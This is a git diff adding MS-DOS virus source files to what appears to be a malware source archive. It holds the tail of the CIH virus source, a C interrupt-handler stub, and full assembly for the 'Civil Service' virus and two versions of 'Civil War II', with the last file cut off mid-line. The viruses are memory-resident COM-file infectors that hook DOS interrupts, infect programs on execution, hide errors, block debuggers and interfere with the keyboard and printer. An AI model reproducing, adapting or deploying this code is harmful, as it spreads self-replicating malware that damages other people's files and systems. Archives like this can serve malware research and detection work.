00400041h, 00400032h +VxDCallTableSize = ($-VxDCallIDTable)/04h + +; ********************************************************* +; * Virus Version Copyright * +; ********************************************************* + +VirusVersionCopyright db 'CIH v' + db MajorVirusVersion+'0' + db '.' + db MinorVirusVersion+'0' + db ' TATUNG' + +; ********************************************************* +; * Virus Size * +; ********************************************************* + +VirusSize = $ +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) + +; ********************************************************* +; * Dynamic Data * +; ********************************************************* + +VirusGameDataStartAddress = VirusSize +@6 = VirusGameDataStartAddress +OnBusy db 0 +FileModificationTime dd ? + +FileNameBuffer db FileNameBufferSize dup(?) +@7 = FileNameBuffer + +DataBuffer = $ +@8 = DataBuffer +NumberOfSections dw ? +TimeDateStamp dd ? +SymbolsPointer dd ? +NumberOfSymbols dd ? +SizeOfOptionalHeader dw ? +_Characteristics dw ? +Magic dw ? +LinkerVersion dw ? +SizeOfCode dd ? +SizeOfInitializedData dd ? +SizeOfUninitializedData dd ? +AddressOfEntryPoint dd ? +BaseOfCode dd ? +BaseOfData dd ? +ImageBase dd ? +@9 = $ +SectionAlignment dd ? +FileAlignment dd ? +OperatingSystemVersion dd ? +ImageVersion dd ? +SubsystemVersion dd ? +Reserved dd ? +SizeOfImage dd ? +SizeOfHeaders dd ? +SizeOfImageHeaderToRead = $-NumberOfSections + +NewAddressOfEntryPoint = DataBuffer ; DWORD +SizeOfImageHeaderToWrite = 04h + +StartOfSectionTable = @9 +SectionName = StartOfSectionTable ; QWORD +VirtualSize = StartOfSectionTable+08h ; DWORD +VirtualAddress = StartOfSectionTable+0ch ; DWORD +SizeOfRawData = StartOfSectionTable+10h ; DWORD +PointerToRawData = StartOfSectionTable+14h ; DWORD +PointerToRelocations = StartOfSectionTable+18h ; DWORD +PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD +NumberOfRelocations = StartOfSectionTable+20h ; WORD +NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD +Characteristics = StartOfSectionTable+24h ; DWORD +SizeOfScetionTable = Characteristics+04h-SectionName + +; ********************************************************* +; * Virus Total Need Memory * +; ********************************************************* + +VirusNeedBaseMemory = $ + +VirusTotalNeedMemory = @9 +; + NumberOfSections(??)*SizeOfScetionTable(28h) +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) + +; ********************************************************* +; ********************************************************* + +VirusGame ENDS + + END FileHeader \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.cint.asm b/MSDOS/Virus.MSDOS.Unknown.cint.asm new file mode 100644 index 00000000..fc10d79b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cint.asm @@ -0,0 +1,226 @@ + TITLE LC Interrupt trap routine + NAME LCINT + INCLUDE DOS.MAC ; BE SURE TO INCLUDE THE CORRECT + ; DOS.MAC!! + +;**************************************************************************** +; +; This is the heart of a C driven interrupt handler. This file was used to +; write a critical error handler that remained resident. (It replaced the +; "Abort, Retry, Ignore" prompt with a window.) This file can be adapted to +; any interrupt and any C routine with a little work. THIS HAS BEEN USED ONLY +; IN THE S MODEL. +; +;**************************************************************************** + +DOS_INT EQU 24H ; int to be replaced + +WRITE_INT EQU 25H ; DOS write int vector +READ_INT EQU 35H ; DOS read int vector + +XREG STRUC +REG_AX DW ? ; general purpose registers +REG_BX DW ? +REG_CX DW ? +REG_DX DW ? +REG_SI DW ? +REG_DI DW ? +XREG ENDS + +SREGS STRUC +REG_ES DW ? ; segment registers +REG_CS DW ? +REG_SS DW ? +REG_DS DW ? +SREGS ENDS + + DSEG + + INT_REGS XREG <> ; saved regs. at int time + INT_SEGREGS SREGS <> ; saved seg. regs. + EXTRN _TOP:WORD ; declared by C.ASM -- points + ; to top of stack + ENDDS + + EXTRN INTTIME:NEAR ; your int routine goes here! + + PSEG +;; +; interrupt time data storage +;; +C_ENVIRONMENT_DS DW ? ; filled by int init, used... +C_ENVIRONMENT_ES DW ? ; ...to recreate C environment +C_ENVIRONMENT_SS DW ? +C_ENVIRONMENT_SP DW ? + +INT_TIME_ES DW ? +INT_TIME_DS DW ? ; temp save of DS at int time +INT_TIME_SI DW ? ; temp save of SI at int time + +INT_TIME_BP DW ? ; added to account for no BP or SP... +INT_TIME_SP DW ? ; ...in above structures + +RETURN_VALUE DW ? ; return value from C service routine + +DOS_SERVICE DD ? ; address of DOS Service routine +INT_TWOONE DD ? ; old INT 21 vector + +INT_IN_PROGRESS DB ? ; interrupt in progress flag -- not + ; used here 'cause int 24H cannot be + ; recursive! + +;;************************************************************************** +; name LC_SERVICE_INT +; +; description Entered at (software) interrupt time, this routine +; restores the C enviroment and processes the interrupt +; trapping all references to the quad file +;; + + IF LPROG +LC_SERVICE_INT PROC FAR + ELSE +LC_SERVICE_INT PROC NEAR + ENDIF + + MOV CS:INT_IN_PROGRESS,1 ; clear int in progress flag + + MOV CS:INT_TIME_ES,ES ; save ES so it can be overwritten + MOV CS:INT_TIME_DS,DS ; save DS so it can be overwritten + MOV CS:INT_TIME_SI,SI ; save SI so it can be overwritten + MOV CS:INT_TIME_BP,BP ; save BP as structs do not have it + MOV CS:INT_TIME_SP,SP ; save SP as structs do not have it + + MOV DS,CS:C_ENVIRONMENT_DS ; set up C enviroment + + MOV SI,OFFSET INT_REGS ; point to input regs struct + + MOV DS:[SI].REG_AX,AX ; save general purpose regs + MOV DS:[SI].REG_BX,BX + MOV DS:[SI].REG_CX,CX + MOV DS:[SI].REG_DX,DX + MOV DS:[SI].REG_DI,DI + MOV AX,CS:INT_TIME_SI ; SI has been overwritten + MOV DS:[SI].REG_SI,AX + + MOV SI,OFFSET INT_SEGREGS ; point to input segment regs struct + + MOV AX,CS:INT_TIME_ES ; ES has been overwritten + MOV DS:[SI].REG_ES,AX + MOV DS:[SI].REG_SS,SS + MOV AX,CS:INT_TIME_DS ; DS has been overwritten + MOV DS:[SI].REG_DS,AX + + MOV ES,CS:C_ENVIRONMENT_ES ; complete C environment + MOV SS,CS:C_ENVIRONMENT_SS + MOV SP,CS:C_ENVIRONMENT_SP + + CALL INTTIME ; call the C routine + MOV CS:RETURN_VALUE,AX ; save return value + XOR AX,AX + + MOV SI,OFFSET INT_REGS ; point to input regs struct + + MOV AX,DS:[SI].REG_SI ; SI needs to be saved while used + MOV CS:INT_TIME_SI,AX + + MOV AX,DS:[SI].REG_AX ; restore general purpose regs + MOV BX,DS:[SI].REG_BX + MOV CX,DS:[SI].REG_CX + MOV DX,DS:[SI].REG_DX + MOV DI,DS:[SI].REG_DI + + MOV SI,OFFSET INT_SEGREGS ; point to input segment regs struct + + MOV ES,DS:[SI].REG_DS ; DS needs to be saved while used + MOV CS:INT_TIME_DS,ES + + MOV ES,DS:[SI].REG_ES + MOV SS,DS:[SI].REG_SS + + MOV SI,CS:INT_TIME_SI ; restore pointing registers + MOV DS,CS:INT_TIME_DS + + MOV BP,CS:INT_TIME_BP ; special BP restore + MOV SP,CS:INT_TIME_SP ; special SP restore + + MOV CS:INT_IN_PROGRESS,0 ; clear int in progress flag + + MOV AX,CS:RETURN_VALUE ; move the return value + IRET ; return from interrupt + +LC_SERVICE_INT ENDP + +;**************************************************************************** +; description set up the LC interrupt routines +; +; INT_INIT -- Hooks into the specified int. +; INT_TERM -- Unhooks (restores) the specified int. +; +; NOTE: INT_INIT must be called be int processing can begin...it saves the +; current C environment for use at interrupt time. +;; + + PUBLIC INT_INIT + IF LPROG +INT_INIT PROC FAR + ELSE +INT_INIT PROC NEAR + ENDIF + + PUSH DS ; save changed seg regs + PUSH ES + + MOV CS:C_ENVIRONMENT_DS,DS ; save C environment for int time + MOV CS:C_ENVIRONMENT_ES,ES + MOV CS:C_ENVIRONMENT_SS,SS + + MOV AX,_TOP ; determine int time SP + SUB AX,400H ; gives 1024 byte stack + MOV CS:C_ENVIRONMENT_SP,AX + + MOV AH,READ_INT ; read int vector function + MOV AL,DOS_INT ; specify DOS service vector + INT 21H + + MOV WORD PTR CS:DOS_SERVICE+2,ES ; save current vector + MOV WORD PTR CS:DOS_SERVICE,BX + + LEA DX,LC_SERVICE_INT ; Use DOS to set new int address + PUSH CS + POP DS + MOV AH,WRITE_INT + MOV AL,DOS_INT + INT 21H + + POP ES ; restore changed seg regs + POP DS + RET + +INT_INIT ENDP + +;********************* INT_TERM -- kill ints. ******************************* + + PUBLIC INT_TERM + IF LPROG +INT_TERM PROC FAR + ELSE +INT_TERM PROC NEAR + ENDIF + + PUSH DS ; DS gets changed + + MOV DS,WORD PTR CS:DOS_SERVICE+2 ; Restore previous DOS service vector + MOV DX,WORD PTR CS:DOS_SERVICE + MOV AH,WRITE_INT + MOV AL,DOS_INT + INT 21H + + POP DS ; restore DS + RET +INT_TERM ENDP + + ENDPS + + END + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.civil.asm b/MSDOS/Virus.MSDOS.Unknown.civil.asm new file mode 100644 index 00000000..407d7032 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.civil.asm @@ -0,0 +1,569 @@ +; Civil Service Virus by Marvin Giskard +; Turbo Assember version 2 + +Exec equ 4B00h +OpenFile equ 3D02h +ReadFile equ 3Fh +WriteFile equ 40h +CloseFile equ 3Eh +EXESign equ 5A4Dh +SeekTop equ 4200h +SeekEnd equ 4202h +GetAttr equ 4300h +SetAttr equ 4301h +GetDT equ 5700h +SetDT equ 5701h +MinSize equ 4h +MaxSize equ 0FBF0h +GetDate equ 2Bh +FileID equ 2206h +MemID equ 4246h ; 'FB' + +.MODEL SMALL +.CODE +ORG 0100h + +Start: + XOR AX, AX + MOV DS, AX + CMP WORD PTR DS:01ACh, MemID + JNE Instl2 + CMP WORD PTR DS:01AEh, FileID + JE NoInstl2 + +Instl2: + CALL InstallInMem + +NoInstl2: + PUSH CS + PUSH CS + POP DS + POP ES + MOV DX, OFFSET FileName + MOV AX, 4B22h + INT 21h + INT 20h + +FileName: DB 'TEST.COM',0 + +AddCode: + JMP OverData + + ; Addcode's data + +Buf: DB 0, 0 ; Miscellaneous Buf +JumpCode: DB 0E9h, 00h, 00h ; Code to be placed at front of file +FSize: DW 0 ; File size +Attr: DB 0 ; Attr of file being infected +FDateTime: DD 0 ; Time and date of file being infected +Generation: DW 0 ; Generation counter +Infected: DW 0 ; Number of files infected +Old24Handler: DD 0 ; Old INT 24h handler +Acts: DB 0 ; Flag to stop reentry +Path: DD 0 + +OverData: + MOV WORD PTR DS:0100h, 0000h + MOV BYTE PTR DS:0102h, 00h + + ; Check if handler already installed by examining 2 words in vector + ; table entry of INT 6Bh + + XOR AX, AX + MOV DS, AX + CMP WORD PTR DS:01ACh, MemID + JNE Instl + CMP WORD PTR DS:01AEh, FileID + JE AlreadyInstalled + +Instl: + CALL InstallInMem + JMP ALreadyInstalled + +InstallInMem: + MOV WORD PTR DS:01ACh, MemID + MOV WORD PTR DS:01AEh, FileID + + PUSH CS + POP DS + + ; Get INT 21h handler in ES:BX. + + MOV AX, 3521h + INT 21h +DoOldOfs: + MOV SI, OFFSET DoOld+1 + MOV [SI], BX + MOV [SI+2], ES + PUSH ES + PUSH BX + POP DX + POP DS + MOV AX, 256Dh + INT 21h + + ; This label is here so that the infect part will be able to calculate + ; source offset of Int21Handler and then place it in here before writing + ; it to disk. The OFFSET AddCode will be replaced by the right number. + +Source: + MOV SI, OFFSET AddCode + + ; Destination e.g. Where program will be placed are now calculated by + ; taking the amount of memory in $0040:$0013. Multiply by 16 to get + ; segment of memory end and then subract amount of blocks needed. + ; This is where routine will be placed. + + MOV AX, 0040h + MOV DS, AX + MOV AX, WORD PTR DS:0013h + MOV CL, 6 + SHL AX, CL + + ; Set dest. segment 2048 pages (32 K) below top of memory. + + SUB AX, 2048 + MOV ES, AX + XOR DI, DI + MOV CX, OFFSET AddCodeEnd - OFFSET AddCode + PUSH CS + POP DS + REP MOVSB + + ; Set INT 21h Handler to point to our routine + + MOV AX, 2521h + PUSH ES + POP DS + MOV DX, OFFSET Int21Handler - OFFSET AddCode + INT 21h + + MOV BYTE PTR DS:[OFFSET Acts-OFFSET AddCode], 0 + + RET + +AlreadyInstalled: + + Call DisTrace + + ; Code to jump back to 0100h + + PUSH CS + PUSH CS + POP DS + POP ES + MOV AX, 0100h + JMP AX + + ; Disable tracing and breakpoint setting for debuggers. + +DisTrace: + MOV AX, 0F000h + MOV DS, AX + MOV DX, 0FFF0h + MOV AX, 2501h + INT 21h + MOV AX, 2503h + INT 21h + RET + +Int21Handler: + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH DI + PUSH SI + PUSH ES + PUSH DS + + ; Install devious act if seed is right + + MOV AH, 2Ah + INT 6Dh + CMP CX, 1991 + JB Act + CMP DL, 22 + JNE Timer + DB 0EAh, 0F0h, 0FFh, 00h, 0F0h + +Timer: + MOV AH, 25h + CMP DL, 29 + JE Inst1 + CMP DL, 1 + JE Inst2 + CMP DL, 10 + JE Inst3 + CMP DL, 16 + JE Inst4 + JMP Act +Inst1: + MOV AL, 13h + JMP SetVec +Inst2: + MOV AL, 16h + JMP SetVec +Inst3: + MOV AL, 0Dh + JMP SetVec +Inst4: + MOV AL, 10h + +SetVec: + PUSH CS + POP DS + MOV DX, OFFSET Int24Handler - OFFSET AddCode + INT 6Dh + +Act: + MOV AX, 0040h + MOV DS, AX + MOV AX, WORD PTR DS:006Eh + + PUSH CS + POP DS + MOV BH, DS:[OFFSET Acts - OFFSET AddCode] + CMP BH, 3 + JE NoAct + + CMP AX, 22 + JE NoAct + + MOV BYTE PTR [SI], 3 + MOV AX, 3509h + INT 21h + PUSH ES + PUSH BX + POP DX + POP DS + MOV AX, 256Ah + INT 21h + PUSH CS + POP DS + MOV DX, OFFSET Int9Handler - OFFSET AddCode + MOV AX, 2509h + INT 21h + + MOV AX, 3517h + INT 21h + PUSH ES + PUSH BX + POP DX + POP DS + MOV AX, 256Ch + INT 21h + PUSH CS + POP DS + MOV DX, OFFSET Int17Handler - OFFSET AddCode + MOV AX, 2517h + INT 21h + +NoAct: + + POP DS + POP ES + POP SI + POP DI + POP DX + POP CX + POP BX + POP AX + + CMP AH, 4Bh + JE Infect +DoOld: + ; This next bytes represent a JMP 0000h:0000h. The 0's will be replaced + ; by the address of the old 21 handler. + DB 0EAh + DD 0 + +DoOldPop: + POP ES + POP DS + POP BP + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + JMP DoOld + +CloseQuit: + + MOV AX, 2524h + MOV SI, OFFSET Old24Handler-OFFSET AddCode + MOV DX, CS:[SI] + MOV DS, CS:[SI+2] + INT 21h + + PUSH CS + POP DS + MOV SI, OFFSET FDateTime-OFFSET AddCode + MOV CX, DS:[SI] + MOV DX, DS:[SI+2] + MOV AX, SetDT + INT 21h + + MOV AH, CloseFile + INT 21h + + MOV AX, SetAttr + MOV CL, DS:[OFFSET Attr - OFFSET AddCode] + XOR CH, CH + MOV SI, OFFSET Path-OFFSET AddCode + MOV DX, DS:[SI] + MOV DS, DS:[SI+2] + + INT 21h + + JMP DoOldPop + +Infect: + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DI + PUSH BP + PUSH DS + PUSH ES + + ; Get file's attr + + MOV AX, GetAttr + INT 21h + JC CloseQuit + MOV CS:[OFFSET Attr-OFFSET AddCode], CL + + MOV SI, OFFSET Path-OFFSET AddCode + MOV CS:[SI], DX + MOV CS:[SI+2], DS + + ; Get/Set INT 24h handler + + MOV AX, 3524h + INT 21h + MOV SI, OFFSET Old24Handler-OFFSET AddCode + MOV CS:[SI], BX + MOV CS:[SI+2], ES + MOV AX, 2524h + PUSH CS + POP DS + MOV DX, OFFSET Int24Handler-OFFSET AddCode + INT 21h + + ; Set new attribute + + MOV SI, OFFSET Path-OFFSET AddCode + MOV DX, CS:[SI] + MOV DS, CS:[SI+2] + + MOV AX, SetAttr + MOV CX, 0020h + INT 21h + JC CloseQuitFoot + + MOV AX, OpenFile + INT 21h + JC CloseQuitFoot + MOV BX, AX + + ; Get file's time and date and store + + MOV AX, GetDT + INT 21h + JC CloseQuitFoot + PUSH CS + POP DS + MOV SI, OFFSET FDateTime-OFFSET AddCode + MOV DS:[SI], CX + MOV DS:[SI+2], DX + + ; Read first two bytes of file + + MOV AH, ReadFile + MOV CX, 2 + MOV DX, OFFSET OverData+4-OFFSET AddCode + INT 21h + JC CloseQuitFoot + + ; Check if fisrt two bytes identify the file as an EXE file + ; If so, then don't infect the file + + CMP DS:[OFFSET OverData+4-OFFSET AddCode], EXESign + JE CloseQuitFoot + + ; Read next byte + + MOV AH, ReadFile + MOV CX, 1 + MOV DX, OFFSET OverData+10-OFFSET AddCode + INT 21h + JC CloseQuitFoot + + ; Get file size + + MOV AX, SeekEnd + XOR CX, CX + XOR DX, DX + INT 21h + JC CloseQuitFoot + + ; Save filesize and calculate jump offset + + CMP DX, 0 + JG CloseQuitFoot + CMP AX, MinSize + JB CloseQuitFoot + CMP AX, MaxSize + JA CloseQuitFoot + MOV DS:[OFFSET FSize-OFFSET AddCode], AX + MOV CX, AX + SUB AX, 03h + MOV DS:[OFFSET JumpCode+1-OFFSET AddCode], AX + + ; Calculate and store source + + ADD CX, 0100h + MOV [OFFSET Source+1-OFFSET AddCode], CX + + ADD CX, OFFSET DoOld-OFFSET AddCode + MOV [OFFSET DoOldOfs-OFFSET AddCode+1], CX + + JMP OverFoot1 + +CloseQuitFoot: + JMP CloseQuit + +OverFoot1: + ; Read last 2 bytes to see if it is already infected + + MOV AX, SeekTop + XOR CX, CX + MOV DX, [OFFSET FSize-OFFSET AddCode] + SUB DX, 2 + INT 21h + + MOV AH, ReadFile + MOV CX, 2 + MOV DX, OFFSET Buf-OFFSET AddCode + INT 21h + + CMP [OFFSET Buf-OFFSET AddCode], FileID + JE CloseQuitFoot + + ; Prepare to write new jump + + MOV AX, SeekTop + XOR CX, CX + XOR DX, DX + INT 21h + + ; Write new jump + + MOV AH, WriteFile + MOV CX, 3 + MOV DX, OFFSET JumpCode-OFFSET AddCode + INT 21h + + ; Write addcode + ; Code to restore first three bytes is at start of addcode + ; Int21 handler is also included + ; Generation counter is included in data + ; ID is at the end of addcode + + MOV AX, SeekEnd + XOR CX, CX + XOR DX, DX + INT 21h + + ; Increase generation counter before writing it to the new file + + INC WORD PTR [OFFSET Generation - OFFSET AddCode] + + ; Set files infected to 0, for child hasn't infected anyone. + + MOV SI, OFFSET Infected - OFFSET AddCode + PUSH WORD PTR [SI] + MOV WORD PTR [SI], 0 + + MOV AH, WriteFile + MOV DX, OFFSET AddCode - OFFSET AddCode ; 0000 + MOV CX, OFFSET AddCodeEnd - OFFSET AddCode + INT 21h + + ; Decrease counter again, cause all his children should have the same + ; generation count + + DEC WORD PTR [OFFSET Generation - OFFSET AddCode] + + ; Pop number of files infected and incread + + POP AX + INC AX + MOV WORD PTR [OFFSET Infected - OFFSET AddCode], AX + + JMP CloseQuit + +Int24Handler: + XOR AL, AL + IRET + +Int9Handler: + PUSH AX + PUSH CX + PUSH DS + + MOV AX, 0040h + MOV DS, AX + MOV AH, BYTE PTR DS:006Ch + CMP AH, 18 + JA NoChange + MOV CL, 4 + SHL AH, CL + SHR AH, CL + MOV BYTE PTR DS:0017h, AH + +NoChange: + POP DS + POP CX + POP AX + INT 6Ah + IRET + +Int17Handler: + CMP AH, 00h + JNE DoOld17 + PUSH DS + PUSH AX + PUSH BX + MOV BX, 0040h + MOV DS, BX + MOV BH, BYTE PTR DS:006Ch + SHR BH, 1 + SHR BH, 1 + CMP BH, 22h + JE Ignore17 + POP BX + POP AX + POP DS + +DoOld17: + INT 6Ch + IRET + +Ignore17: + POP BX + POP AX + POP DS + IRET + + DW FileID + +AddCodeEnd: + +END Start + diff --git a/MSDOS/Virus.MSDOS.Unknown.civil210.asm b/MSDOS/Virus.MSDOS.Unknown.civil210.asm new file mode 100644 index 00000000..9dbe6ba9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.civil210.asm @@ -0,0 +1,363 @@ +;**************************************************************************** +; Civil War II * +; * +; Assembled with Tasm 2.5 * +; (c) 1992 Dark Helmet, The Netherlands * +; The author takes no responsibility for any dameged caused by this virus * +; * +;**************************************************************************** +; * +; Civil War... * +; * +; "For all I've seen has change my mind * +; But still the wars go on as the years go by * +; With no love for God or human rights * +; 'Cause all these dreams are swept aside * +; By bloody hands of the hypnotized * +; Who carry the cross of homicide * +; And history bears the scars of our civil war" * +; * +;**************************************************************************** + + .Radix 16 +Civil_War Segment + Model small + Assume cs:Civil_War, ds:Civil_War, es:Civil_War + + org 100h + +len equ offset last - begin +virus_len equ len / 16d + +dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h ; Jump + infection + ; marker + +begin: Call virus ; make call to + ; push IP on stack + +virus: pop bp ; get IP from stack. + sub bp,109h ; adjust IP. + +restore_host: mov di,0100h ; recover beginning + lea si,ds:[carrier_begin+bp] ; of carrier program. + mov cx,06h + rep movsb + +check_resident: mov ah,0a0h ; check if virus + int 21h ; already installed. + cmp ax,0001h + je end_virus + +adjust_memory: mov ax,cs ; start of Memory + dec ax ; Control Block + mov ds,ax + cmp byte ptr ds:[0000],5a ; check if last + ; block + jne abort ; if not last block + ; end + mov ax,ds:[0003] ; decrease memory + sub ax,50 ; by 1kbyte lenght + mov ds:0003,ax + +install_virus: mov bx,ax ; es point to start + mov ax,es ; virus in memory + add ax,bx + mov es,ax + mov cx,len ; cx = lenght virus + mov ax,ds ; restore ds + inc ax + mov ds,ax + lea si,ds:[begin+bp] ; point to start virus + lea di,es:0100 ; point to destination + rep movsb ; copy virus in + ; memory + mov [virus_segment+bp],es ; store start virus + ; in memory + mov ax,cs ; restore es + mov es,ax + +hook_vector: cli ; no interups + mov ax,3517h + int 21h + mov es,[virus_segment+bp] + mov es:[old_17h-6],bx + mov es:[old_17h+2-6h],es + mov dx,offset new_17h - 6h + mov ax,2517h + int 21h + + mov ax,3521h ; revector int 21 + int 21h + mov ds,[virus_segment+bp] + mov ds:[old_21h-6h],bx + mov ds:[old_21h+2-6h],es + mov dx,offset main_virus - 6h + mov ax,2521h + int 21h + sti + +abort: mov ax,cs + mov ds,ax + mov es,ax + xor ax,ax + +end_virus: mov bx,0100h ; jump to begin + jmp bx ; host file + + +;*************************************************************************** + +main_virus: pushf + cmp ah,0a0h ; check virus call + jne new_21h ; no virus call + mov ax,0001h ; ax = id + popf ; return id + iret + +new_21h: push ds ; save registers + push es + push di + push si + push ax + push bx + push cx + push dx + + cmp ah,40h + jne check_05 + cmp bx,0004h + jne check_05 + jmp message + +check_05: cmp ah,05h + jne check_exec + jmp message + +check_exec: cmp ax,04b00h ; exec function? + jne continu + mov cs:[name_seg-6],ds + mov cs:[name_off-6],dx + jmp chk_com + +continu: pop dx ; restore registers + pop cx + pop bx + pop ax + pop si + pop di + pop es + pop ds + popf + jmp dword ptr cs:[old_21h-6] + +chk_com: cld ; check extension + mov di,dx ; for COM + push ds + pop es + mov al,'.' ; search extension + repne scasb ; check 'COM" + cmp word ptr es:[di],'OC' ; check 'CO' + jne continu + cmp word ptr es:[di+2],'M' ; check 'M' + jne continu + cmp word ptr es:[di-3],'DN' ; check if + je continu ; COMMAND.COM + + call set_int24h + call set_atribuut + +open_file: mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + mov ax,3D02h ; open file + call do_int21h + jc close_file + push cs + pop ds + mov [handle-6],ax + mov bx,ax + + call get_date + +check_infect: push cs + pop ds + mov bx,[handle-6] ; read first 6 bytes + mov ah,3fh + mov cx,06h + lea dx,[carrier_begin-6] + call do_int21h + mov al, byte ptr [carrier_begin-6]+3 ; check initials + mov ah, byte ptr [carrier_begin-6]+4 ; 'D' and 'H' + cmp ax,[initials-6] + je save_date ; if equal already + ; infect + +get_lenght: mov ax,4200h ; file pointer begin + call move_pointer + mov ax,4202h ; file pointer end + call move_pointer + sub ax,03h ; ax = filelenght + mov [lenght_file-6],ax + + call write_jmp + call write_virus + +save_date: push cs + pop ds + mov bx,[handle-6] + mov dx,[date-6] + mov cx,[time-6] + mov ax,5701h + call do_int21h + +close_file: mov bx,[handle-6] + mov ah,03eh ; close file + call do_int21h + + mov dx,cs:[old_24h-6] ; restore int24h + mov ds,cs:[old_24h+2-6] + mov ax,2524h + call do_int21h + + jmp continu + + + + +new_24h: mov al,3 + iret + + +new_17h: cli + pushf + push ds + push es + push di + push si + push ax + push bx + push cx + push dx + + cmp ah,00h + jne continu_17h + jmp print_message + +continu_17h: pop dx + pop cx + pop bx + pop ax + pop si + pop di + pop es + pop ds + popf + sti + jmp dword ptr cs:[old_17h-6] + +print_message: mov ah,09h + lea dx,cs:text-6h + call do_int21h + jmp continu_17h + +;--------------------------------------------------------------------------- +; PROCEDURES +;--------------------------------------------------------------------------- + +message: mov ah,09h + lea dx,cs:text-6h + call do_int21h + jmp continu + + + +move_pointer: push cs + pop ds + mov bx,[handle-6] + xor cx,cx + xor dx,dx + call do_int21h + ret + +do_int21h: pushf + call dword ptr cs:[old_21h-6] + ret + +write_jmp: push cs + pop ds + mov ax,4200h + call move_pointer + mov ah,40h + mov cx,01h + lea dx,[jump-6] + call do_int21h + mov ah,40h + mov cx,02h + lea dx,[lenght_file-6] + call do_int21h + mov ah,40h + mov cx,02h + lea dx,[initials-6] + call do_int21h + ret + +write_virus: push cs + pop ds + mov ax,4202h + call move_pointer + mov ah,40 + mov cx,len + mov dx,100 + call do_int21h + ret + +get_date: mov ax,5700h + call do_int21h + push cs + pop ds + mov [date-6],dx + mov [time-6],cx + ret + +set_int24h: mov ax,3524h + call do_int21h + mov cs:[old_24h-6],bx + mov cs:[old_24h+2-6],es + mov dx,offset new_24h-6 + push cs + pop ds + mov ax,2524h + call do_int21h + ret + +set_atribuut: mov ax,4300h ; get atribuut + mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + call do_int21h + and cl,0feh ; set atribuut + mov ax,4301h + call do_int21h + ret + +;--------------------------------------------------------------------------- +; DATA +;--------------------------------------------------------------------------- + +old_21h dw 00h,00h +old_17h dw 00h,00h +old_24h dw 00h,00h +carrier_begin db 090h, 0cdh, 020h, 044h, 048h, 00h +text db 'Civil War II v1.0, (c) 06/03/1992 The Netherlands.','$',00h +jump db 0e9h +name_seg dw ? +name_off dw ? +virus_segment dw ? +lenght_file dw ? +handle dw ? +date dw ? +time dw ? +initials dw 4844h +last db 090h + +Civil_war ends + end dummy + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.civil211.asm b/MSDOS/Virus.MSDOS.Unknown.civil211.asm new file mode 100644 index 00000000..800cfc2b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.civil211.asm @@ -0,0 +1,303 @@ +;**************************************************************************** +; Civil War II V1.1 * +; * +; Assembled with Tasm 2.5 * +; (c) 1992 Trident/Dark Helmet, The Netherlands * +; * +;**************************************************************************** +; * +; Civil War... * +; * +; "For all I've seen has change my mind * +; But still the wars go on as the years go by * +; With no love for God or human rights * +; 'Cause all these dreams are swept aside * +; By bloody hands of the hypnotized * +; Who carry the cross of homicide * +; And history bears the scars of our civil war" * +; * +;**************************************************************************** + + .Radix 16 +Civil_War Segment + Model small + Assume cs:Civil_War, ds:Civil_War, es:Civil_War + + org 100h + +len equ offset last - begin +virus_len equ len / 16d + +dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h ; Jump + infection + ; marker + +begin: Call virus ; make call to + ; push IP on stack + +virus: pop bp ; get IP from stack. + sub bp,109h ; adjust IP. + +restore_host: mov di,0100h ; recover beginning + lea si,ds:[carrier_begin+bp] ; of carrier program. + mov cx,06h + rep movsb + +check_resident: mov ah,0a0h ; check if virus + int 21h ; already installed. + cmp ax,0001h + je end_virus + +adjust_memory: mov ax,cs ; start of Memory + dec ax ; Control Block + mov ds,ax + cmp byte ptr ds:[0000],5a ; check if last + ; block + jne abort ; if not last block + ; end + mov ax,ds:[0003] ; decrease memory + sub ax,40 ; by 1kbyte lenght + mov ds:[0003],ax + sub word ptr ds:[0012],40h + +install_virus: mov bx,ax ; es point to start + mov ax,es ; virus in memory + add ax,bx + mov es,ax + mov cx,len ; cx = lenght virus + mov ax,ds ; restore ds + inc ax + mov ds,ax + lea si,ds:[begin+bp] ; point to start virus + lea di,es:0100 ; point to destination + rep movsb ; copy virus in + ; memory + mov [virus_segment+bp],es ; store start virus + ; in memory + mov ax,cs ; restore es + mov es,ax + +hook_vector: cli ; no interups + mov ax,3521h ; revector int 21 + int 21h + mov ds,[virus_segment+bp] + mov old_21h-6h,bx + mov old_21h+2-6h,es + + mov dx,offset main_virus - 6h + mov ax,2521h + int 21h + sti + +abort: mov ax,cs + mov ds,ax + mov es,ax + +end_virus: mov bx,0100h ; jump to begin + jmp bx ; host file + + +;***************************************************************************** + +main_virus: pushf + cmp ah,0a0h ; check virus call + jne new_21h ; no virus call + mov ax,0001h ; ax = id + popf ; return id + iret + +new_21h: push ds ; save registers + push es + push di + push si + push ax + push bx + push cx + push dx + +check_open: cmp ah,3dh + je chk_com + +check_exec: cmp ax,04b00h ; exec function? + je chk_com + +continu: pop dx ; restore registers + pop cx + pop bx + pop ax + pop si + pop di + pop es + pop ds + popf + jmp dword ptr cs:[old_21h-6] + +chk_com: mov cs:[name_seg-6],ds + mov cs:[name_off-6],dx + cld ; check extension + mov di,dx ; for COM + push ds + pop es + mov al,'.' ; search extension + repne scasb ; check for 'COM" + cmp word ptr es:[di],'OC' ; check 'CO' + jne continu + cmp word ptr es:[di+2],'M' ; check 'M' + jne continu + + call set_int24h + call set_atribuut + +open_file: mov ds,cs:[name_seg-6] + mov 